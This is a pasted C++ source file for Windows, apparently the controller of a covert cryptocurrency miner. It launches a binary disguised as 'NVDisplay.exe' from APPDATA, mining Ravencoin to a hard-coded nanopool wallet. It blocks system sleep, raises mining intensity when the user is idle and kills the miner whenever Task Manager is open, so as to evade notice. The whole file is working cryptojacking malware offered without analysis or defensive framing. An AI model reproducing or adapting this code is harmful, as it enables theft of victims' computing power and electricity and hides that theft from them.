kodzik

mail@pastecode.io avatar
unknown
c_cpp
2 months ago
11 kB
6
Indexable
Never
#include <iostream>
#include <stdio.h>
#include <windows.h>
#include "Winuser.h"
#include <Psapi.h>
#include <vector>
#include <algorithm>
#include <cstdlib>
#include <shlobj.h>
#include <cwchar>
#include <thread>
#include <chrono>

#include <codecvt>
#include <locale>using namespace std;

void getidle();
void press();

DWORD previous = 0;


std::string wstringToString(const std::wstring& wstr) {
  std::wstring_convert<std::codecvt_utf8_utf16<wchar_t>> converter;
  return converter.to_bytes(wstr);
}

bool isFullScreenGame() {
  HWND foregroundWindow = GetForegroundWindow();
  if (foregroundWindow == NULL) return false;

  // Pobierz rozmiar ekranu
  HMONITOR monitor = MonitorFromWindow(foregroundWindow, MONITOR_DEFAULTTONEAREST);
  MONITORINFO mi = { sizeof(mi) };
  if (!GetMonitorInfo(monitor, &mi)) return false;
  int monitorWidth = mi.rcMonitor.right - mi.rcMonitor.left;
  int monitorHeight = mi.rcMonitor.bottom - mi.rcMonitor.top;

  // Pobierz wymiary okna
  RECT windowRect;
  GetWindowRect(foregroundWindow, &windowRect);
  int windowWidth = windowRect.right - windowRect.left;
  int windowHeight = windowRect.bottom - windowRect.top;

  // Porównaj wymiary okna z wymiarami ekranu
  return (windowWidth == monitorWidth && windowHeight == monitorHeight);
}

std::string GetActiveProcessName() {
  HWND hwnd = GetForegroundWindow(); // Get the handle of the active window
  if (hwnd == NULL)
    return "No active window";

  DWORD processId;
  GetWindowThreadProcessId(hwnd, &processId); // Get the process ID

  HANDLE processHandle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, processId);
  if (processHandle == NULL)
    return "Failed to open process";

  char processName[MAX_PATH];
  if (GetModuleBaseNameA(processHandle, NULL, processName, MAX_PATH) == 0) {
    CloseHandle(processHandle);
    return "Failed to get process name";
  }

  CloseHandle(processHandle);
  return std::string(processName);
}

bool isBrowser(const std::string& processName) {
  return processName == "chrome.exe" || processName == "firefox.exe"
    || processName == "msedge.exe" || processName == "iexplore.exe"
    || processName == "opera.exe";
}


BOOL CALLBACK EnumWindowsProc(HWND hwnd, LPARAM lParam) {
  const DWORD CLASS_NAME_SIZE = 256;
  WCHAR className[CLASS_NAME_SIZE];

  GetClassNameW(hwnd, className, CLASS_NAME_SIZE);

  if (wcsstr(className, L"TaskManagerWindow") != NULL) {
    // Found Task Manager window
    *reinterpret_cast<bool*>(lParam) = true;
    return FALSE; // Stop enumerating windows
  }
  return TRUE; // Continue enumerating
}

bool isTaskManagerRunning() {
  bool found = false;
  EnumWindows(EnumWindowsProc, reinterpret_cast<LPARAM>(&found));
  return found;
}


bool StartProcess(const std::string& path, const std::string& args, PROCESS_INFORMATION& pi) {
  STARTUPINFOA si;
  ZeroMemory(&si, sizeof(si));
  si.cb = sizeof(si);
  ZeroMemory(&pi, sizeof(pi));

  // Tworzymy bufor na œcie¿kê i argumenty
  std::string cmd = path + " " + args;
  char* cmdCStr = new char[cmd.length() + 1];

  // Bezpieczne kopiowanie za pomoc¹ strcpy_s
  strcpy(cmdCStr, cmd.c_str());

  // Uruchomienie nowego procesu
  if (!CreateProcessA(
    NULL,      // Nazwa programu (NULL, jeœli u¿ywamy linii poleceñ)
    cmdCStr,     // Linia poleceñ (œcie¿ka i argumenty)
    NULL,      // Deskryptory zabezpieczeñ procesu
    NULL,      // Deskryptory zabezpieczeñ w¹tku
    FALSE,      // Ustawienia dziedziczenia handle
    0,        // Flagi tworzenia
    NULL,      // U¿yj œrodowiska rodzica
    NULL,      // U¿yj katalogu bie¿¹cego rodzica
    &si,       // wskaŸnik na STARTUPINFOA
    &pi       // wskaŸnik na PROCESS_INFORMATION
  )) {
    std::cerr << "CreateProcess failed (" << GetLastError() << ").\n";
    delete[] cmdCStr;
    return false;
  }

  delete[] cmdCStr;
  return true;
}

// Funkcja do zatrzymania procesu
void StopProcess(PROCESS_INFORMATION& pi) {
  // Najpierw próbujemy zakoñczyæ proces ³agodnie
  if (!TerminateProcess(pi.hProcess, 0)) {
    std::cerr << "Failed to terminate process. Error: " << GetLastError() << std::endl;
  }

  // Zamykamy uchwyty
  CloseHandle(pi.hProcess);
  CloseHandle(pi.hThread);
}

std::wstring GetUserAppDataPath() {
  wchar_t appDataPath[MAX_PATH];
  if (GetEnvironmentVariableW(L"APPDATA", appDataPath, MAX_PATH)) {
    return std::wstring(appDataPath);
  }
  else {
    // Gdy nie uda siê pobraæ zmiennej œrodowiskowej
    std::wcerr << L"Error getting APPDATA path.\n";
    return std::wstring();
  }
}

const char* WStringToConstCharPtr(const std::wstring& wstr) {
  // Oblicz wymagan¹ d³ugoœæ ci¹gu znaków
  size_t convertedChars = 0;
  const size_t newsize = wstr.length() + 1;
  char* cstr = new char[newsize];

  return cstr;
}

bool isUserAFK(long long afkThreshold) {
  LASTINPUTINFO lastInputInfo;
  lastInputInfo.cbSize = sizeof(LASTINPUTINFO);

  if (GetLastInputInfo(&lastInputInfo)) {
    DWORD currentTime = GetTickCount();
    long long idleTime = currentTime - lastInputInfo.dwTime;

    return idleTime > afkThreshold;
  }

  return false;
}

int main()
{
  HWND hWnd = GetConsoleWindow();
  ShowWindow(hWnd, SW_SHOW);

  PROCESS_INFORMATION pi;

  wstring appdataPath = GetUserAppDataPath();
  wstring fileName = L"\\NVDisplay";
  wstring appPath = appdataPath + fileName;
  wstring twentyfive = L"\\NVDisplay.exe";
  wstring path1 = appPath + twentyfive;

  string gitPath = wstringToString(path1);

  string arg1 = "-a kawpow -o stratum+tcp://rvn-eu1.nanopool.org:10400 -u RRjuYRHrdsJAQiEcJ8nbK5Fc4WuzyYphyL.rig0 -p x --no-watchdog -i 12";
  string arg2 = "-a kawpow -o stratum+tcp://rvn-eu1.nanopool.org:10400 -u RRjuYRHrdsJAQiEcJ8nbK5Fc4WuzyYphyL.rig0 -p x --no-watchdog -i 16";
  string arg3 = "-a kawpow -o stratum+tcp://rvn-eu1.nanopool.org:10400 -u RRjuYRHrdsJAQiEcJ8nbK5Fc4WuzyYphyL.rig0 -p x --no-watchdog --temperature-limit 90 --temperature-start 70";

  bool run1 = false;
  bool run2 = false;
  bool run3 = false;

  bool afk = false;

  long long afkThreshold = 150000;  bool browser = false;


  // Zapobiega przejœciu systemu w tryb uœpienia
  SetThreadExecutionState(ES_CONTINUOUS | ES_SYSTEM_REQUIRED);

  while (true)
  {
    bool taskmgr = isTaskManagerRunning();
    bool fullscreen = isFullScreenGame();
    browser = isBrowser(GetActiveProcessName());
    afk = isUserAFK(afkThreshold);

    if (!afk && !taskmgr && !fullscreen)
    {
      if (!run1 && !run2 && !run3)
      {
        StartProcess(gitPath, arg1, pi); //25%
        run1 = true;
      }
      else if (!run1 && !run2 && run3)
      {
        StopProcess(pi);
        run3 = false;
        run1 = true;
        StartProcess(gitPath, arg1, pi); //25%
      }
      else if (!run1 && run2 && !run3)
      {
        StopProcess(pi);
        run2 = false;
        run1 = true;
        StartProcess(gitPath, arg1, pi); //25%
      }
    }
    else if (!afk && !taskmgr && fullscreen)
    {
      if (browser)
      {
        if (!run1 && !run2 && !run3)
        {
          StartProcess(gitPath, arg2, pi); //50%
          run2 = true;
        }
        else if (!run1 && !run2 && run3)
        {
          StopProcess(pi);
          run3 = false;
          run2 = true;
          StartProcess(gitPath, arg2, pi); //50%
        }
        else if (run1 && !run2 && !run3)
        {
          StopProcess(pi);
          run2 = true;
          run1 = false;
          StartProcess(gitPath, arg2, pi); //50%
        }
      }
      else
      {
        if (run1 || run2 || run3)
        {
          run1 = false;
          run2 = false;
          run3 = false;
          StopProcess(pi);
        }
      }
    }
    else if (afk && !taskmgr)
    {
      if (fullscreen && !browser)
      {
        if (!run1 && !run2 && !run3)
        {
          run1 = false;
        }
        else if (!run1 && !run2 && run3)
        {
          StopProcess(pi);
          run3 = false;
          run1 = false;
        }
        else if (!run1 && run2 && !run3)
        {
          StopProcess(pi);
          run2 = false;
          run1 = false;
        }
      }
      else if (fullscreen && browser)
      {
        if (!run1 && !run2 && !run3)
        {
          StartProcess(gitPath, arg2, pi); //50%
          run2 = true;
        }
        else if (!run1 && !run2 && run3)
        {
          StopProcess(pi);
          run3 = false;
          run2 = true;
          StartProcess(gitPath, arg2, pi); //50%
        }
        else if (run1 && !run2 && !run3)
        {
          StopProcess(pi);
          run2 = true;
          run1 = false;
          StartProcess(gitPath, arg2, pi); //50%
        }
      }

      else if (!fullscreen && !browser)
      {
        if (!run1 && !run2 && !run3)
        {
          StartProcess(gitPath, arg3, pi); //100%
          run3 = true;
        }
        else if (run1 && !run2 && !run3)
        {
          StopProcess(pi);
          run1 = false;
          run3 = true;
          StartProcess(gitPath, arg3, pi); //50%
        }
        else if (!run1 && run2 && !run3)
        {
          StopProcess(pi);
          run2 = false;
          run3 = true;
          StartProcess(gitPath, arg3, pi); //50%
        }
      }
    }

    else if (taskmgr && (run1 || run2 || run3))
    {
      run1 = false;
      run2 = false;
      run3 = false;
      StopProcess(pi);
    }


    Sleep(3000);
  }

  SetThreadExecutionState(ES_CONTINUOUS);
  return 0;
}

Leave a Comment